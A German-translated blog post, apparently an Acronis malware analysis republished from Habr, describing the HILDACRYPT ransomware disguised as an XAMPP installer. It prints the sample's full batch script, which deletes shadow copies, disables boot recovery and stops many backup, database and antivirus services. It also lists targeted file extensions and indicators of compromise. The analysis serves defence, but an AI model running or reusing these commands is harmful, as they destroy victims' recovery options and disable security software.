{"id":52277,"date":"2019-11-05T00:00:00","date_gmt":"2019-11-04T21:00:00","guid":{"rendered":"https:\/\/prohoster.info\/blog\/blog_prohoster\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam"},"modified":"2020-02-18T13:59:57","modified_gmt":"2020-02-18T10:59:57","slug":"hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","status":"publish","type":"post","link":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","title":{"rendered":"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>Hallo, Habr! Und wieder berichten wir \u00fcber die neuesten Versionen von Malware aus der Kategorie Ransomware. HILDACRYPT ist ein neues Ransomware-Programm, das zur im August 2019 entdeckten Familie Hilda geh\u00f6rt, die nach einem Cartoon des Streamingdienstes Netflix benannt wurde, der zur Verbreitung der Software verwendet wurde. Heute lernen wir die technischen Besonderheiten dieses aktualisierten Ransomware-Virus kennen.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein\" src=\"\/wp-content\/uploads\/2019\/11\/b42870531485dd30670e35e6a5e5125f.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><br \/>\nIn der ersten Version der Ransomware Hilda war der Link zu dem auf YouTube ver\u00f6ffentlichten <noindex><a rel=\"nofollow\" href=\"https:\/\/www.youtube.com\/watch?v=XCojP2Ubuto\">Trailer<\/a><\/noindex> der Zeichentrickserie im L\u00f6segeldbrief enthalten. HILDACRYPT hingegen tarnt sich als legitimer Installer von XAMPP \u2013 einem einfach zu installierenden Paket von Apache, das MariaDB, PHP und Perl umfasst. Dabei hat der Krypto-Locker einen anderen Dateinamen \u2013 xamp. Au\u00dferdem hat die Ransomware-Datei keine elektronische Signatur.<\/p>\n<h3>Statische Analyse<\/h3>\n<p>\nDie Ransomware befindet sich in einer PE32 .NET-Datei, die f\u00fcr MS Windows geschrieben wurde. Ihre Gr\u00f6\u00dfe betr\u00e4gt 135.168 Byte. Sowohl der Hauptprogrammcode als auch der Code des Schutzprogramms sind in C# geschrieben. Laut dem Zeitstempel der Kompilierung wurde die Bin\u00e4rdatei am 14. September 2019 erstellt.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein\" src=\"\/wp-content\/uploads\/2019\/11\/9b04f91f5f56ad0ff981bb2a944fa848.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nLaut Detect It Easy ist die Ransomware mit Confuser und ConfuserEx gepackt, aber diese Obfuscatoren sind die gleichen wie zuvor, nur dass ConfuserEx der Nachfolger von Confuser ist, sodass die Signaturen ihrer Codes \u00e4hnlich sind. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein\" src=\"\/wp-content\/uploads\/2019\/11\/ce65d4db560ea7d62ef228378ab207e6.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nHILDACRYPT ist tats\u00e4chlich mit ConfuserEx gepackt. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein\" src=\"\/wp-content\/uploads\/2019\/11\/eee308f9f6080b616c08e2f6709245d8.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nSHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a<\/p>\n<h3>Angriffsvektor<\/h3>\n<p>\nWahrscheinlich wurde die Ransomware auf einer der Websites zum Thema Webprogrammierung entdeckt, wo sie sich als legitime Software XAMPP tarnt.<\/p>\n<p>Die gesamte Infektionskette kann in <noindex><a rel=\"nofollow\" href=\"https:\/\/app.any.run\/tasks\/abe20240-2f3c-40cf-b5dd-4f0088ab1c5a\/\">app.any.run sandbox<\/a><\/noindex>.<\/p>\n<h3>Obfuskation <\/h3>\n<p>\nDie Codezeilen der Ransomware werden verschl\u00fcsselt gespeichert. Beim Start entschl\u00fcsselt HILDACRYPT sie mit Hilfe von Base64 und AES-256-CBC.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein\" src=\"\/wp-content\/uploads\/2019\/11\/9e2a478ba19480308dcff887c2353e18.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h3>Installation<\/h3>\n<p>\nZun\u00e4chst erstellt die Ransomware im %AppDataRoaming% ein Verzeichnis, f\u00fcr das eine GUID (Globally Unique Identifier) zuf\u00e4llig generiert wird. Indem sie eine bat-Datei in diesem Verzeichnis hinzuf\u00fcgt, startet die Ransomware diese mit cmd.exe:<\/p>\n<p><i>cmd.exe \/c JKfgkgj3hjgfhjka.bat &amp; exit<br \/>\n<\/i><br \/>\n<img decoding=\"async\" alt=\"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein\" src=\"\/wp-content\/uploads\/2019\/11\/5319151b3f57af2394e6031f4cd1bcd6.jpg\" style=\"display:block;margin: 0 auto;\" \/><img decoding=\"async\" alt=\"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein\" src=\"\/wp-content\/uploads\/2019\/11\/c0c749619f3f9a240e362f5effb5ea2e.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\nDann beginnt sie mit der Ausf\u00fchrung des Batch-Skripts, um systemweite Funktionen oder Dienste zu deaktivieren.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein\" src=\"\/wp-content\/uploads\/2019\/11\/ecea9735d151835ddeeb62986b325399.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nDas Skript enth\u00e4lt eine lange Liste von Befehlen, mit denen Schattenkopien gel\u00f6scht, der SQL-Server, Backups und Antivirenl\u00f6sungen deaktiviert werden.<\/p>\n<p>Zum Beispiel versucht er vergeblich, die Acronis Backup-Dienste zu stoppen. Dar\u00fcber hinaus greift er die Backup-Systeme und Antivirus-L\u00f6sungen der folgenden Anbieter an: Veeam, Sophos, Kaspersky, McAfee und andere.<\/p>\n<pre><code class=\"plaintext\">@echo off\n:: Ich bin nicht wirklich ein Fan von Ponys, Zeichentrickm\u00e4dchen sind besser, oder?\nvssadmin resize shadowstorage \/for=c: \/on=c: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=c: \/on=c: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=d: \/on=d: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=d: \/on=d: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=e: \/on=e: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=e: \/on=e: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=f: \/on=f: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=f: \/on=f: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=g: \/on=g: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=g: \/on=g: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=h: \/on=h: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=h: \/on=h: \/maxsize=unbounded\nbcdedit \/set {default} recoveryenabled No\nbcdedit \/set {default} bootstatuspolicy ignoreallfailures\nvssadmin Delete Shadows \/all \/quiet\nnet stop SQLAgent$SYSTEM_BGC \/y\nnet stop \u201cSophos Device Control Service\u201d \/y\nnet stop macmnsvc \/y\nnet stop SQLAgent$ECWDB2 \/y\nnet stop \u201cZoolz 2 Service\u201d \/y\nnet stop McTaskManager \/y\nnet stop \u201cSophos AutoUpdate Service\u201d \/y\nnet stop \u201cSophos System Protection Service\u201d \/y\nnet stop EraserSvc11710 \/y\nnet stop PDVFSService \/y\nnet stop SQLAgent$PROFXENGAGEMENT \/y\nnet stop SAVService \/y\nnet stop MSSQLFDLauncher$TPSAMA \/y\nnet stop EPSecurityService \/y\nnet stop SQLAgent$SOPHOS \/y\nnet stop \u201cSymantec System Recovery\u201d \/y\nnet stop Antivirus \/y\nnet stop SstpSvc \/y\nnet stop MSOLAP$SQL_2008 \/y\nnet stop TrueKeyServiceHelper \/y\nnet stop sacsvr \/y\nnet stop VeeamNFSSvc \/y\nnet stop FA_Scheduler \/y\nnet stop SAVAdminService \/y\nnet stop EPUpdateService \/y\nnet stop VeeamTransportSvc \/y\nnet stop \u201cSophos Health Service\u201d \/y\nnet stop bedbg \/y\nnet stop MSSQLSERVER \/y\nnet stop KAVFS \/y\nnet stop Smcinst \/y\nnet stop MSSQLServerADHelper100 \/y\nnet stop TmCCSF \/y\nnet stop wbengine \/y\nnet stop SQLWriter \/y\nnet stop MSSQLFDLauncher$TPS \/y\nnet stop SmcService \/y\nnet stop ReportServer$TPSAMA \/y\nnet stop swi_update \/y\nnet stop AcrSch2Svc \/y\nnet stop MSSQL$SYSTEM_BGC \/y\nnet stop VeeamBrokerSvc \/y\nnet stop MSSQLFDLauncher$PROFXENGAGEMENT \/y\nnet stop VeeamDeploymentService \/y\nnet stop SQLAgent$TPS \/y\nnet stop DCAgent \/y\nnet stop \u201cSophos Message Router\u201d \/y\nnet stop MSSQLFDLauncher$SBSMONITORING \/y\nnet stop wbengine \/y\nnet stop MySQL80 \/y\nnet stop MSOLAP$SYSTEM_BGC \/y\nnet stop ReportServer$TPS \/y\nnet stop MSSQL$ECWDB2 \/y\nnet stop SntpService \/y\nnet stop SQLSERVERAGENT \/y\nnet stop BackupExecManagementService \/y\nnet stop SMTPSvc \/y\nnet stop mfefire \/y\nnet stop BackupExecRPCService \/y\nnet stop MSSQL$VEEAMSQL2008R2 \/y\nnet stop klnagent \/y\nnet stop MSExchangeSA \/y\nnet stop MSSQLServerADHelper \/y\nnet stop SQLTELEMETRY \/y\nnet stop \u201cSophos Clean Service\u201d \/y\nnet stop swi_update_64 \/y\nnet stop \u201cSophos Web Control Service\u201d \/y\nnet stop EhttpSrv \/y\nnet stop POP3Svc \/y\nnet stop MSOLAP$TPSAMA \/y\nnet stop McAfeeEngineService \/y\nnet stop \u201cVeeam Backup Catalog Data Service\u201d \/\net stop MSSQL$SBSMONITORING \/y\nnet stop ReportServer$SYSTEM_BGC \/y\nnet stop AcronisAgent \/y\nnet stop KAVFSGT \/y\nnet stop BackupExecDeviceMediaService \/y\nnet stop MySQL57 \/y\nnet stop McAfeeFrameworkMcAfeeFramework \/y\nnet stop TrueKey \/y\nnet stop VeeamMountSvc \/y\nnet stop MsDtsServer110 \/y\nnet stop SQLAgent$BKUPEXEC \/y\nnet stop UI0Detect \/y\nnet stop ReportServer \/y\nnet stop SQLTELEMETRY$ECWDB2 \/y\nnet stop MSSQLFDLauncher$SYSTEM_BGC \/y\nnet stop MSSQL$BKUPEXEC \/y\nnet stop SQLAgent$PRACTTICEBGC \/y\nnet stop MSExchangeSRS \/y\nnet stop SQLAgent$VEEAMSQL2008R2 \/y\nnet stop McShield \/y\nnet stop SepMasterService \/y\nnet stop \u201cSophos MCS Client\u201d \/y\nnet stop VeeamCatalogSvc \/y\nnet stop SQLAgent$SHAREPOINT \/y\nnet stop NetMsmqActivator \/y\nnet stop kavfsslp \/y\nnet stop tmlisten \/y\nnet stop ShMonitor \/y\nnet stop MsDtsServer \/y\nnet stop SQLAgent$SQL_2008 \/y\nnet stop SDRSVC \/y\nnet stop IISAdmin \/y\nnet stop SQLAgent$PRACTTICEMGT \/y\nnet stop BackupExecJobEngine \/y\nnet stop SQLAgent$VEEAMSQL2008R2 \/y\nnet stop BackupExecAgentBrowser \/y\nnet stop VeeamHvIntegrationSvc \/y\nnet stop masvc \/y\nnet stop W3Svc \/y\nnet stop \u201cSQLsafe Backup Service\u201d \/y\nnet stop SQLAgent$CXDB \/y\nnet stop SQLBrowser \/y\nnet stop MSSQLFDLauncher$SQL_2008 \/y\nnet stop VeeamBackupSvc \/y\nnet stop \u201cSophos Safestore Service\u201d \/y\nnet stop svcGenericHost \/y\nnet stop ntrtscan \/y\nnet stop SQLAgent$VEEAMSQL2012 \/y\nnet stop MSExchangeMGMT \/y\nnet stop SamSs \/y\nnet stop MSExchangeES \/y\nnet stop MBAMService \/y\nnet stop EsgShKernel \/y\nnet stop ESHASRV \/y\nnet stop MSSQL$TPSAMA \/y\nnet stop SQLAgent$CITRIX_METAFRAME \/y\nnet stop VeeamCloudSvc \/y\nnet stop \u201cSophos File Scanner Service\u201d \/y\nnet stop \u201cSophos Agent\u201d \/y\nnet stop MBEndpointAgent \/y\nnet stop swi_service \/y\nnet stop MSSQL$PRACTICEMGT \/y\nnet stop SQLAgent$TPSAMA \/y\nnet stop McAfeeFramework \/y\nnet stop \u201cEnterprise Client Service\u201d \/y\nnet stop SQLAgent$SBSMONITORING \/y\nnet stop MSSQL$VEEAMSQL2012 \/y\nnet stop swi_filter \/y\nnet stop SQLSafeOLRService \/y\nnet stop BackupExecVSSProvider \/y\nnet stop VeeamEnterpriseManagerSvc \/y\nnet stop SQLAgent$SQLEXPRESS \/y\nnet stop OracleClientCache80 \/y\nnet stop MSSQL$PROFXENGAGEMENT \/y\nnet stop IMAP4Svc \/y\nnet stop ARSM \/y\nnet stop MSExchangeIS \/y\nnet stop AVP \/y\nnet stop MSSQLFDLauncher \/y\nnet stop MSExchangeMTA \/y\nnet stop TrueKeyScheduler \/y\nnet stop MSSQL$SOPHOS \/y\nnet stop \u201cSQL Backups\u201d \/y\nnet stop MSSQL$TPS \/y\nnet stop mfemms \/y\nnet stop MsDtsServer100 \/y\nnet stop MSSQL$SHAREPOINT \/y\nnet stop WRSVC \/y\nnet stop mfevtp \/y\nnet stop msftesql$PROD \/y\nnet stop mozyprobackup \/y\nnet stop MSSQL$SQL_2008 \/y\nnet stop SNAC \/y\nnet stop ReportServer$SQL_2008 \/y\nnet stop BackupExecAgentAccelerator \/y\nnet stop MSSQL$SQLEXPRESS \/y\nnet stop MSSQL$PRACTTICEBGC \/y\nnet stop VeeamRESTSvc \/y\nnet stop sophossps \/y\nnet stop ekrn \/y\nnet stop MMS \/y\nnet stop \u201cSophos MCS Agent\u201d \/y\nnet stop RESvc \/y\nnet stop \u201cAcronis VSS Provider\u201d \/y\nnet stop MSSQL$VEEAMSQL2008R2 \/y\nnet stop MSSQLFDLauncher$SHAREPOINT \/y\nnet stop \u201cSQLsafe Filter Service\u201d \/y\nnet stop MSSQL$PROD \/y\nnet stop SQLAgent$PROD \/y\nnet stop MSOLAP$TPS \/y\nnet stop VeeamDeploySvc \/y\nnet stop MSSQLServerOLAPService \/y\ndel %0\n<\/code><\/pre>\n<p>\nNachdem die oben genannten Dienste und Prozesse deaktiviert wurden, sammelt der Krypto-Locker Informationen \u00fcber alle laufenden Prozesse mit dem Befehl tasklist, um sicherzustellen, dass alle erforderlichen Dienste au\u00dfer Betrieb sind. <br \/>\n<i>tasklist v \/fo csv<\/i><\/p>\n<p>Dieser Befehl liefert eine detaillierte Liste der laufenden Prozesse, deren Elemente durch ein Komma getrennt sind. <br \/>\n<i>\u00abcsrss.exe\u00bb,\u00ab448\u00bb,\u00abservices\u00bb,\u00ab0\u00bb,\u00ab1\ufffd896 \ufffd\ufffd\u00bb,\u00abunknown\u00bb,\ufffd\/\ufffd\u00bb,\u00ab0:00:03\u00bb,\ufffd\/\ufffd\u00bb<br \/>\n<\/i><\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein\" src=\"\/wp-content\/uploads\/2019\/11\/b16a8f52dba47ace2ca99d120f4f9b01.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nNach dieser \u00dcberpr\u00fcfung beginnt das Erpressungsprogramm mit dem Verschl\u00fcsselungsprozess. <\/p>\n<h3>Verschl\u00fcsselung <br \/>\n<\/h3>\n<h4>Dateiverschl\u00fcsselung<\/h4>\n<p>\nHILDACRYPT durchl\u00e4uft den gesamten gefundenen Inhalt der Festplatten, mit Ausnahme der Ordner Recycle.Bin und Reference AssembliesMicrosoft. Letzterer enth\u00e4lt kritische dll-, pdb- und andere Dateien f\u00fcr .Net-Anwendungen, die die Funktionalit\u00e4t des Erpressungsprogramms beeintr\u00e4chtigen k\u00f6nnten. Um nach Dateien zu suchen, die verschl\u00fcsselt werden sollen, wird die folgende Liste von Erweiterungen verwendet:<\/p>\n<p><i>.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md&gt;<br \/>\n<\/i><br \/>\nZur Verschl\u00fcsselung von Benutzerdaten verwendet das Erpressungsprogramm den AES-256-CBC-Algorithmus. Die Schl\u00fcssell\u00e4nge betr\u00e4gt 256 Bit, und die L\u00e4nge des Initialisierungsvektors (IV) betr\u00e4gt 16 Byte. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein\" src=\"\/wp-content\/uploads\/2019\/11\/7c1a57562a3f8ada074639fbab35429d.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nAuf dem n\u00e4chsten Screenshot wurden die Werte byte_2 und byte_1 zuf\u00e4llig mit Hilfe von GetBytes() generiert. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein\" src=\"\/wp-content\/uploads\/2019\/11\/fcd506b4ebf6ccb056b69ccc7249641a.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nSchl\u00fcssel<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein\" src=\"\/wp-content\/uploads\/2019\/11\/9af5398ae995176297743fbd94054d6d.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nVIRUS<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein\" src=\"\/wp-content\/uploads\/2019\/11\/e6626bce140fdfca6bb989602b959786.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nDie verschl\u00fcsselte Datei hat die Erweiterung HCY!.. Dies ist ein Beispiel f\u00fcr eine verschl\u00fcsselte Datei. F\u00fcr diese Datei wurden der oben erw\u00e4hnte Schl\u00fcssel und die IV erstellt. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein\" src=\"\/wp-content\/uploads\/2019\/11\/f6d659bfe8a8217457e06fed916a4f2d.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h4>Verschl\u00fcsselung von Schl\u00fcsseln<\/h4>\n<p>\nDer Kryptolocker speichert den generierten AES-Schl\u00fcssel in der verschl\u00fcsselten Datei. Der erste Teil der verschl\u00fcsselten Datei hat einen Header, der Daten wie HILDACRYPT, KEY, IV, FileLen im XML-Format enth\u00e4lt und sieht folgenderma\u00dfen aus:<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein\" src=\"\/wp-content\/uploads\/2019\/11\/e0d887d87b06346da88104c2d60940b8.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nDie Verschl\u00fcsselung des AES-Schl\u00fcssels und der IV erfolgt mit RSA-2048, die Kodierung erfolgt mit Base64. Der RSA-\u00f6ffentliche Schl\u00fcssel wird im K\u00f6rper des Kryptolockers in einer der verschl\u00fcsselten Zeilen im XML-Format gespeichert.<\/p>\n<p><code>28guEbzkzciKg3N\/ExUq8jGcshuMSCmoFsh\/3LoMyWzPrnfHGhrgotuY\/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u\/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5\/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8\/qfjMtZ41sIIIEyajVKfA18OT72\/UBME2gsAM\/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa\/jQ==AQAB<br \/>\n<\/code><\/p>\n<p>F\u00fcr die Verschl\u00fcsselung des AES-Dateischl\u00fcssels wird der RSA-\u00f6ffentliche Schl\u00fcssel verwendet. Der RSA-\u00f6ffentliche Schl\u00fcssel ist mit Base64 kodiert und besteht aus dem Modul und dem \u00f6ffentlichen Exponenten 65537. F\u00fcr die Entschl\u00fcsselung ist der private RSA-Schl\u00fcssel erforderlich, den der Angreifer hat.<\/p>\n<p>Nach der RSA-Verschl\u00fcsselung wird der AES-Schl\u00fcssel mit Base64 kodiert und in der verschl\u00fcsselten Datei gespeichert.<\/p>\n<h3>L\u00f6segeldnachricht<\/h3>\n<p>\nNach Abschluss der Verschl\u00fcsselung schreibt HILDACRYPT eine HTML-Datei in den Ordner, in dem es die Dateien verschl\u00fcsselt hat. Die Ransomware-Benachrichtigung enth\u00e4lt zwei E-Mail-Adressen, \u00fcber die das Opfer den Angreifer kontaktieren kann.<\/p>\n<ul>\n<li><i>hildalolilovesyou@airmail.cc<\/i><br \/>\n hildalolilovesyou@memeware.net\n<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"HILDACRYPT: ein neues Ransomware-Programm schl\u00e4gt auf Backup-Systeme und Antivirusl\u00f6sungen ein\" src=\"\/wp-content\/uploads\/2019\/11\/9996e9a6741ac3b8c423374c83924a91.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nDie Ransomware-Benachrichtigung enth\u00e4lt auch die Zeile \u201eNo loli is safe;)\u201c \u2014 \u201eKeine Loli ist sicher;)\u201c, \u2014 eine Anspielung auf in Japan verbotene Anime- und Manga-Charaktere mit dem Aussehen kleiner M\u00e4dchen.<\/p>\n<h3>Ausgabe<\/h3>\n<p>\nHILDACRYPT, eine neue Familie von Ransomware, hat eine neue Version ver\u00f6ffentlicht. Das Verschl\u00fcsselungsmodell l\u00e4sst dem Opfer nicht die M\u00f6glichkeit, die von der Ransomware verschl\u00fcsselten Dateien zu entschl\u00fcsseln. Der Kryptolocker verwendet active protection-Methoden, um Sicherheitsdienste, die mit Backup-Systemen und Antivirus-L\u00f6sungen in Verbindung stehen, zu deaktivieren. Der Autor von HILDACRYPT ist ein Fan der durch Netflix gezeigten Zeichentrickserie Hilda, deren Trailer in dem L\u00f6segeldbrief der vorherigen Version enthalten war. <\/p>\n<p>Wie \u00fcblich, <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/business\/backup\/\">Acronis Backup<\/a><\/noindex> und <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/personal\/computer-backup\/\">Acronis True Image<\/a><\/noindex> k\u00f6nnen Ihren Computer vor der Ransomware HILDACRYPT sch\u00fctzen, und Anbieter haben die M\u00f6glichkeit, ihre Kunden durch <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/cloud\/service-provider\/backup\/\">Acronis Backup Cloud<\/a><\/noindex>. Der Schutz wird gew\u00e4hrleistet, da diese L\u00f6sungen <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/cyber-protection\/\">Cyber-Sicherheit<\/a><\/noindex> nicht nur Backup, sondern auch unser integriertes Schutzsystem <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/ransomware-protection\/\">Acronis Active Protection<\/a><\/noindex> \u2014 eine verst\u00e4rkte, auf maschinellem Lernen basierende Technologie, die, wie keine andere, in der Lage ist, Bedrohungen durch Zero-Day-Ransomware entgegenzuwirken.<\/p>\n<h3>Indikatoren f\u00fcr Kompromittierung<\/h3>\n<p>\nDateierweiterung HCY!<br \/>\nHILDACRYPTReadMe.html<br \/>\nxamp.exe mit einem Buchstaben \u201ep\u201c und ohne digitale Signatur<br \/>\nSHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a<br \/>\n<br \/>Quelle: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/company\/acronis\/blog\/474048\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware. HILDACRYPT \u2014 \u044d\u0442\u043e \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 2019 \u0433\u043e\u0434\u0430 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432\u0430 Hilda, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0432 